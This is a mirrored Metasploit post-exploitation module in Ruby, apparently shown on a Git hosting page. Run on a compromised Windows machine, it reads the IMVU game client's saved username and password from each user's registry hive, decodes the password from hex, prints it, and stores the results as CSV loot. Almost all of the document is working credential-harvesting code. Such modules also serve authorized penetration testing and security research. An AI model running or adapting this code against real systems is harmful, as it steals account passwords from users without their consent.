Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

imvu.rb 2.2KB

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788
  1. # -*- coding: binary -*-
  2. ##
  3. # This module requires Metasploit: http://metasploit.com/download
  4. # Current source: https://github.com/rapid7/metasploit-framework
  5. ##
  6. require 'msf/core'
  7. require 'msf/core/auxiliary/report'
  8. class MetasploitModule < Msf::Post
  9. include Msf::Post::Windows::Registry
  10. include Msf::Auxiliary::Report
  11. include Msf::Post::Windows::UserProfiles
  12. def initialize(info = {})
  13. super(update_info(info,
  14. 'Name' => 'Windows Gather Credentials IMVU Game Client',
  15. 'Description' => %q{
  16. This module extracts account username & password from the IMVU game client
  17. and stores it as loot.
  18. },
  19. 'Author' =>
  20. [
  21. 'Shubham Dawra <shubham2dawra[at]gmail.com>' # www.SecurityXploded.com
  22. ],
  23. 'License' => MSF_LICENSE,
  24. 'Platform' => [ 'win' ],
  25. 'SessionTypes' => [ 'meterpreter' ]
  26. ))
  27. end
  28. def run
  29. creds = Rex::Text::Table.new(
  30. 'Header' => 'IMVU Credentials',
  31. 'Indent' => 1,
  32. 'Columns' =>[
  33. 'User',
  34. 'Password'
  35. ]
  36. )
  37. credcount=0
  38. userhives=load_missing_hives()
  39. userhives.each do |hive|
  40. next if hive['HKU'] == nil
  41. vprint_status("Looking at Key #{hive['HKU']}")
  42. subkeys = registry_enumkeys("#{hive['HKU']}\\Software\\IMVU\\")
  43. if subkeys.nil? or subkeys.empty?
  44. print_status ("IMVU not installed for this user.")
  45. next
  46. end
  47. user = registry_getvaldata("#{hive['HKU']}\\Software\\IMVU\\username\\", "")
  48. hpass = registry_getvaldata("#{hive['HKU']}\\Software\\IMVU\\password\\", "")
  49. decpass = [ hpass.downcase.gsub(/'/,'').gsub(/\\?x([a-f0-9][a-f0-9])/, '\1') ].pack("H*")
  50. print_good("User=#{user}, Password=#{decpass}")
  51. creds << [user, decpass]
  52. credcount = (credcount + 1)
  53. end
  54. #clean up after ourselves
  55. unload_our_hives(userhives)
  56. print_status("#{credcount} Credentials were found.")
  57. if credcount > 0
  58. print_status("Storing data...")
  59. path = store_loot(
  60. 'imvu.user.creds',
  61. 'text/csv',
  62. session,
  63. creds.to_csv,
  64. 'imvu_user_creds.csv',
  65. 'IMVU User Credentials'
  66. )
  67. print_status("IMVU user credentials saved in: #{path}")
  68. end
  69. end
  70. end